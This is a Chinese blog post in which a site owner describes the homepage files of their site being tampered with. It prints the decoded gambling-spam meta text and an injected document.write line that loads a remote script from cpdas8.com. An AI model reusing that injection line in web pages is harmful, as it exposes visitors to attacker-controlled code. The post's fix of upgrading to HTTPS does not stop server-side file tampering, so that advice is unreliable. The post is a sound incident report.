naro

您所在的位置:首页 > 解决方案 > 安装配置 > 正文
导言:最近根文件老是被人篡改,通过哪种技术手段未知,但都是篡改首页的html和php文件,所以打算把http协议升级到https。

不清楚攻击者是通过哪种渠道修改我的html和php文件,然后在header注入了如下图的代码,可笑的是竟然还加过密。

0.png

title解密出来的内容是,“怎么做北京赛车代理_PK10北京赛车代理_北京赛车高赔率代理_北京赛车代理。”(可耻)

keywords解密出来的内容是,“北京赛车pk10代理,北京赛车信誉平台,北京赛车pk10招代理,北京赛车pk计划,北京赛车代理盘,北京赛车官网,北京赛车高手交流群,北京赛车游戏,北京赛车代理群,北京pk10官网网址,北京赛车平台,北京赛车玩法,北京赛车pk10代理盘,北京赛车稳赚,北京赛车代理怎么做。”(很可耻)

description解密出来的内容是,“北京赛车pk10代理【cx88cp.com】多年专注于北京赛车开户,北京赛车代理,北京赛车合作,北京pk10开户,北京pk10代理,全天代理,为您提供全面的北京赛车代理服务。”(极度可耻)

以上都是通过base64加密处理过的,可以通过在线工具解密。


注入的script也是奇葩,通过工具解密出来的结果是

window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/cxc.js"></script>');


这里我第一步把根目录html和php的权限都设置成只读状态,不允许修改。

第二步把原来的http协议升级到https,http和https有什么区别呢?

简单地说https在http和tcp之间添加了一个安全协议层(SSL或TSL),秘钥在客户端和服务器才有。https之所以比http安全,是因为他利用ssl/tls协议传输(包含证书,卸载,流量转发,负载均衡,页面适配,浏览器适配,refer传递等。)保障了传输过程的安全性。

注意http的端口号为80,https的端口号为443,具体的安装配置可以参考本站文章:阿里云http升级https协议二三事